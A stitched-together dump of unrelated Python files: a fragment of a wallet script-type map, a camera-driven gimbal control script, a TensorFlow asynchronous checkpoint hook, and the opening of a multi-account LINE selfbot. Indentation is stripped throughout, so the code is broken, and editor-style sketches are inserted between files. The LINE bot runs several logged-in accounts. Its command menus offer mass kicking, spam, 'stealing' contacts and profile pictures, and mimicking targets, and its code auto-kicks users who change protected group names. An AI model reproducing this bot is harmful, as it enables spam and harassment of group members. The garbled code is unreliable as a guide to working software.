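# path built by show_address()/sign_message(). Plain strings stand in for the
# safetlib message types so the sketch runs without the library installed.
_SCRIPT_TYPE_SKETCH = {
    'p2wpkh': 'SPENDWITNESS', 'p2wsh': 'SPENDWITNESS',
    'p2wpkh-p2sh': 'SPENDP2SHWITNESS', 'p2wsh-p2sh': 'SPENDP2SHWITNESS',
    'p2pkh': 'SPENDADDRESS', 'p2sh': 'SPENDMULTISIG',
}

def _sketch_address_path(derivation, change, index):
    """E.g. _sketch_address_path("m/49'/0'/0'", 0, 5) -> "m/49'/0'/0'/0/5"."""
    return "%s/%d/%d" % (derivation, change, index)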
|
old_main.py
|
"""
Author: Param Deshpande
Date created: Mon 27 Apr 18:11:03 IST 2020
Description:
Main jetson/pc python file for controlling gimbal via the tracked object.
License :
------------------------------------------------------------
"THE BEERWARE LICENSE" (Revision 42):
Param Deshpande wrote this code. As long as you retain this
notice, you can do whatever you want with this stuff. If we
meet someday, and you think this stuff is worth it, you can
buy me a beer in return.
------------------------------------------------------------
date modified: Mon 27 Apr 18:11:03 IST 2020
"""
#import gimbalcmd
if __name__ == '__main__':
import concurrent.futures
import logging
import queue
import random
import threading
import serial
import time
#import ball_tracking
import cv2
import ComArduino2 as stcom
import greenBallTracker as GBT
#import
""" WRITE YOUR VARIABLES HERE """
NO_OF_PTS = 3
CHANGE_YAW_THOLD = 2
CHANGE_PITCH_THOLD = 2
THRES_PERCENT_CHANGE = 0.10
VID_SRC = 2
FRAME_CX = 460/2
FRAME_CY = 639/2
PIX_PER_DEG = 18.0
PIX_PER_DEG_VAR = 1.3
MAX_NO_FRAMES = 10
ACK_MCU_MSG = '1'
# need not change these vars.
MAX_DEL_YAW = FRAME_CX/(PIX_PER_DEG+PIX_PER_DEG_VAR)
MAX_DEL_PITCH = FRAME_CY/(PIX_PER_DEG+PIX_PER_DEG_VAR)
# should be equal to t_grab / t_tick_mcu
imageQ = queue.Queue(maxsize=10000)
commQ = queue.Queue(maxsize=30000)
""" WRITE YOUR FUNCTIONS HERE """
def trajectoryGen(centerXY, newXY, numpts = NO_OF_PTS):
"""
(tup size2, tup size2, int) -> (list of [roll, pitch, yaw] lists)
Description: generates a trajectory of delta gimbal angles.
"""
trajList = []
# make sure to negate the vals as the axes/coords are inverted w.r.t. the gimbal.
delYaw = -(newXY[0] - centerXY[0])/(PIX_PER_DEG+PIX_PER_DEG_VAR)
delPitch = -(newXY[1] - centerXY[1])/(PIX_PER_DEG+PIX_PER_DEG_VAR)
# ignore the change if it is below min(default threshold, TH% of the max angle change).
if(abs(delYaw) < min(CHANGE_YAW_THOLD,THRES_PERCENT_CHANGE*MAX_DEL_YAW)):
delYaw = 0
if(abs(delPitch) < min(CHANGE_PITCH_THOLD,THRES_PERCENT_CHANGE*MAX_DEL_PITCH)):
delPitch = 0
# S1: linearly divide points from 0 to the delta angles, as [roll, pitch, yaw].
if((newXY[0] != -1) and (newXY[1] != -1)):
#if delYaw , delPitch greater than angle threshold.
for i in range(numpts):
trajList.append([0, i*delPitch/(numpts-1), i*delYaw/(numpts-1)])
# if no obj detected.
else:
for i in range(numpts):
trajList.append([0, 0, 0])
return trajList
#def ...:
# """
# () -> ()
# Description:
# >>>
#
# """
def grabber_thread(event, source = VID_SRC, imgQ = imageQ):
"""
(Event, int, Queue) -> NoneType
Description : Grabs the image and puts it into the imageQ buffer.
"""
cap = cv2.VideoCapture(source)
time.sleep(3.0)
grabberLock = threading.Lock()
imgQ_size = imgQ.qsize()
while not event.is_set():
start_time = time.time() # start time of the loop
imgQ_size = imgQ.qsize()
logging.info(" no of frames" + str(imgQ_size))
grabbed, frame = cap.read()
# to keep the buffer from lagging, i.e. stay as close to real time as possible.
if(imgQ_size < MAX_NO_FRAMES):
with grabberLock:
pass
imgQ.put(frame)
#logging.info("frame grab runtime" + str(time.time() - start_time))
logging.info("FPS frame grab: " + str(1.0 / (time.time() - start_time))) # FPS = 1 / time to process loop
cap.release()  # cv2.VideoCapture has no stop(); release() frees the camera
#def show_frame(frame, event):
# while not event.is_set():
def process_thread(event, source = VID_SRC, trajQ = commQ, imgQ = imageQ):
"""
@brief : pops imgQ process img and calc gimb trajectory and sets the event.
"""
objA = 0
objCX = 0
objCY = 0
old_objA = 0
old_objCX = 0
old_objCY = 0
processLock = threading.Lock()
trajList = []
while(1):
if not imgQ.empty():
start_time_proc = time.time()
frame = imgQ.get()
#logging.info(" no of process frames" + str(imgQ.qsize()))
if (source != 0):
frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)
old_objA, old_objCX, old_objCY = objA, objCX, objCY
objA, objCX, objCY = GBT.trackGreenBall(frame)
logging.info(str(objA) + " " +str(objCX) + " " +str(objCY))
with processLock:
pass
trajList = trajectoryGen((FRAME_CX, FRAME_CY), (objCX, objCY))
trajQ.put(trajList)
#logging.info("size of commsQ" + str(trajQ.qsize()))
cv2.imshow("Process Frame", frame)
if cv2.waitKey(1) == ord("q"):
event.set()
cv2.destroyAllWindows()
break
#logging.info("runtime process : " + str( (time.time() - start_time_proc))) # FPS = 1 / time to process loop
logging.info("FPS process : " + str(1.0 / (time.time() - start_time_proc))) # FPS = 1 / time to process loop
#cv2.destroyAllWindows()
#"""
# We are sending roll, pitch, yaw to the MCU.
def comms_thread(event,trajQ = commQ):
"""
(Event, Queue) -> NoneType
Description: Sends gimbal traj to mcu and waits for ack.
>>>
"""
ptTrajList = []
dataRecvd = ''
while not event.is_set() :
# if there is a new list of trajectory in the Queue.
if trajQ.qsize() > 0.0:
start_time_comms = time.time()
ptTrajList = trajQ.get()
logging.info("trajQ size after "+str(trajQ.qsize()))
## start sending vals one by one and wait for ack by mcu.
for i in range(len(ptTrajList)):
gimbal_coords_buffer = []
gimbal_coords_buffer.append("<"+str(ptTrajList[i][0])+', '+str(ptTrajList[i][1])+', '+str(ptTrajList[i][2])+">")
teststr = gimbal_coords_buffer[0]
logging.info(teststr)
stcom.sendToArduino(teststr.encode('utf-8'))
while(dataRecvd != ACK_MCU_MSG):
dataRecvd = stcom.recvFromArduino()
#stcom.runTest(gimbal_coords_buffer)
time.sleep(0.02) # 20 ms for the STM to receive.
#time.sleep(0.05) # 50 ms alternative receive delay.
#logging.info("comms runtime " + str(time.time() - start_time_comms) )
logging.info("FPS comms : " + str(1.0 / (time.time() - start_time_comms))) # FPS = 1 / time to process loop
""" START YOUR CODE HERE """
if __name__ == '__main__':
pass
print()
print()
event = threading.Event()
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Waiting for arduino.")
stcom.waitForArduino()
logging.info("Arduino ready.")
#grab_th = threading.Thread(target = grabber_thread())
#proc_th = threading.Thread(target = process_thread())
#proc_th.start()
#grab_th.start()
# Takes care of joining threads, i.e. main won't proceed past this block until all threads are finished.
with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
executor.submit(process_thread, event)
executor.submit(grabber_thread, event)
executor.submit(comms_thread, event)
# has little effect here: the ThreadPoolExecutor context manager already blocks until the workers finish
time.sleep(7)
event.set()
# executor.submit(f2)
#time.sleep(5.0)
#event.set()
# waits until an "Arduino ready" message is received from the Arduino setup code.
# The onboard computer should be ready first, followed by the Arduino.
#print("waiting for arduino response.")
#ComArduino2.waitForArduino()
#print("stm read successfully. LED should be blinking.")
# creating an empty buffer list.
#gimbal_coords_buffer = []
#gimbal_coords_buffer.append("<100,200,0.2>")
#gimbal_coords_buffer.append("<101,200,0.2>")
#gimbal_coords_buffer.append("<102,200,0.2>")
#gimbal_coords_buffer.append("<103,200,0.2>")
#gimbal_coords_buffer.append("<104,200,0.2>")
#ComArduino2.runTest(gimbal_coords_buffer)
#while (1):
# if cv2.waitKey(1) == ord("q"):
# event.set()
# cv2.destroyAllWindows()
# ball_tracking.live_tracking()
#key = cv2.waitKey(1) & 0xFF
#if key == ord("q"):
# break
#ball_tracking.vs.stop()
#cv2.destroyAllWindows()
#import doctest
#doctest.testmod()
""" END OF FILE """
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# We write the graph and saver_def here, right after session creation.
# We cannot do this in begin(), since we let other hooks change the graph and
# add variables in begin(); the graph is finalized after all begin() calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn,
args=[self])
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
# Save the last checkpoint synchronously if needed.
if last_step != self._timer.last_triggered_step():
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
# Skip saving on step 0
if step == 0:
return
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
for l in self._listeners:
l.after_save(session, step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
if not asynchronous:
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
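# --- Editor's note: a minimal usage sketch, not part of the original module. ---
# AsyncCheckpointSaverHook is used like the synchronous tf.train.CheckpointSaverHook,
# except that the actual save runs on a background thread. The sketch assumes a
# TF1-style graph with a global step already created; `train_op` is a placeholder name.
def _example_async_checkpoint_hook(checkpoint_dir, train_op, num_steps=1000):
    import tensorflow as tf  # assumed TF 1.x, matching the APIs used above
    hook = AsyncCheckpointSaverHook(checkpoint_dir, save_steps=100)
    # save_checkpoint_secs=None disables the default synchronous saver hook.
    with tf.train.MonitoredTrainingSession(checkpoint_dir=checkpoint_dir,
                                           hooks=[hook],
                                           save_checkpoint_secs=None) as sess:
        for _ in range(num_steps):
            sess.run(train_op)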
|
5Bot.Kris.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE() #Luffy
#cl.login(qr=True)
cl.login(token="token")
cl.loginResult()
ki = LINETCR.LINE() #Zorro
#ki.login(qr=True)
ki.login(token="token")
ki.loginResult()
kk = LINETCR.LINE() #Sanji
#kk.login(qr=True)
kk.login(token="token")
kk.loginResult()
kc = LINETCR.LINE() #Ussop
#kc.login(qr=True)
kc.login(token="token")
kc.loginResult()
ks = LINETCR.LINE() #Chooper
#ks.login(qr=True)
ks.login(token="token")
ks.loginResult()
satpam = LINETCR.LINE() #
satpam.login(token="token")#6
#satpam.login(qr=True)
satpam.loginResult()
print "login success bos"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
Owner : ✰Ќriֆ✰
-==================-
◄]·♦·Menu For Public·♦·[►
[•]Help
[•]Key
[•]Mimin
[•]Creator
[•]Time
[•]Say....
[•]Wkwkwk/Wkwk/Wk/wkwkwk/wkwk/wk
[•]Hehehe/Hehe/He/hehehe/hehe/he
[•]Galau
[•]You
[•]Hadeuh
[•]Please
[•]Haaa
[•]Lol
[•]Hmmm/Hmm/Hm/hmmm/hmm/hm
[•]Welcome
[•]Woy
[•]wiki
[•]lyric
[•]instagram
[•]music
[•]youtube
[•]Vidio
[•]Bc
[•]Up
[•]Berapa besar cinta
[•]Apakah
[•]Siapakah cewek
[•]Siapakah cowok
[•]Adakah
[•]Cakepkah
[•]T-eng
[•]T-japan
[•]T-thai
[•]T-id
-==================-
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
-==================-
"""
Keyowner ="""✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
Owner : ✰Ќriֆ✰
-==================-
◄]·♦·Menu For Owner·♦·[►
[•]Kick ...
[•]Invite (by mid)
[•]Undang (Invite user by kontak)
[•]Adminlist
[•]Bot Add @
[•]Spam... (contoh spam on 10 tes)
[•]Bot? (cek kontak bot)
[•]Cancel (cancel undangan tertunda)
[•]clean invites
[•]clear invites
[•]Message change:...
[•]Message add:...
[•]Message
[•]Comment:...
[•]Add comment:...
[•]Jam on/off
[•]Change clock
[•]Jam Update
[•]Status (cek status room)
[•]Cctv
[•]Intip
[•]Toong
[•]Nk
[•]Tajong
[•]Vkick
[•]Emak/Abah
[•]Kill
[•]Absen/Respon
[•]ifconfig
[•]system
[•]cpu
[•]kernel
[•]Debug speed
[•]Bot speed
[•]Speed respon
[•]Turunin
[•]Ancurin
[•]Turun lagi
[•]Spbot
[•]Sp asl
[•]Speedbot
[•]Speed
-==================-
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
-==================-
"""
Setgroup ="""
◄]·♦·Menu For Admin·♦·[►
-==================-
[•]Cancel
[•]Buka qr/Open qr
[•]link open
[•]Tutup qr/Close qr
[•]link close
[•]Rejectall (reject semua invite)
[•]Protect:hight/low
[•]Auto blockqr:off/on
[•]Namelock:on/off
[•]Blockinvite:on/off
[•]Joinn on/off (kick protect join)
[•]Cancel on/off (cancel semua undangan)
[•]Qr on/off (protect qr)
[•]Contact On/off
[•]Join on/off (auto join bot)
[•]Gcancel:on/off (invite grup)
[•]Leave on/off
[•]Share on/off
[•]Add on/off
[•]Cancelall (canccel all invite)
[•]Comment off/on
[•]Backup:on/off
[•]Info Group
[•]ginfo
[•]Group id
[•]TL:....
[•]Gn
[•]LG
[•]LG2
[•]group list
[•]My mid
[•]Mid Bot
[•]Bot restart
[•]Turn off bots
[•]Allbio: (ganti bio stat bot)
[•]Myname: (ganti nama bot)
[•]Banlist
[•]Cek ban
[•]Kill ban
[•]Blacklist @
[•]Banned @
[•]Mid @"
[•]Unban @
[•]Ban
[•]Unban
[•]Steal group pict
[•]Steal cover @
[•]Midpict:..
[•]Steal pict
[•]Steal bio
[•]Steal mid
[•]Steal contact
[•]Mimic on/off
[•]Targetlist
[•]Mimic target
[•]Target @
[•]Del target @
[•]copy @
[•]Backup
[•]Spamcontact @
[•]GBc
[•]Pm cast
[•]Bot like
[•]One piece
[•]Kabur all
[•]Kabur
[•]Bot kadieu
[•]Asupka:
[•]Invite me
[•]Remove all chat
[•]Admin add @ (by tag)
[•]Admin remove @
[•]Cleanse
[•]Ready op
[•]Greet
👑Hanya Untuk Owner and Admin👑
-==================-
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
-==================-
"""
KAC=[cl,ki,kk,kc,ks]
DEF=[ki,kk,kc,ks]
mid = cl.getProfile().mid #Luffy
Amid = ki.getProfile().mid #Zorro
Bmid = kk.getProfile().mid #Sanji
Cmid = kc.getProfile().mid #Ussop
Dmid = ks.getProfile().mid #Chooper
Smid = satpam.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid]
induk=[mid]
Creator=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
admin=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1","mid semua bot"] #Krisna,kris,
owner=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"""тerima Kasih Sudah Menambahkan Aku Jadi Teman
≫ Aku Ga Jawab PM Karna aq Cuma Bot Protect ≪
>>✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰<<
≫ bot protect ≪
≫ SelfBot ≪
ṡȗƿƿȏяṭєԀ ɞʏ:
☆ FS3I FAMILY ☆
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
☆ ONE PIECE BOT PROTECT ☆
Idline: http://line.me/ti/p/GkwfNjoPDH""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\n☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"pname":True,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"qr":True,
"namelock":True,
"Backup":False,
"AutoKick":True,
"Mimic":True,
"Protectjoin":True, # Ga Kepake(Yang Gabung langsung di kick :D) Udah Udah ada Protect Cancell
"Protectcancl":True,
"protectionOn":True,
"winvite":False,
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload an image to Imgur; expects the globals `album` and `image_path` to be defined by the caller.
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
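# --- Editor's note: a small usage sketch, not part of the original bot. ---
# yt() above scrapes the YouTube results page with requests + BeautifulSoup and
# returns a list of shortened "youtu.be..." links. Hypothetical helper, not
# called anywhere in this file:
def _example_yt_search(query="lofi hip hop"):
    links = yt(query)
    return links[0] if links else "no result"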
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
pass
G.name = wait['pname'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
pass
if op.param2 in DEF:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
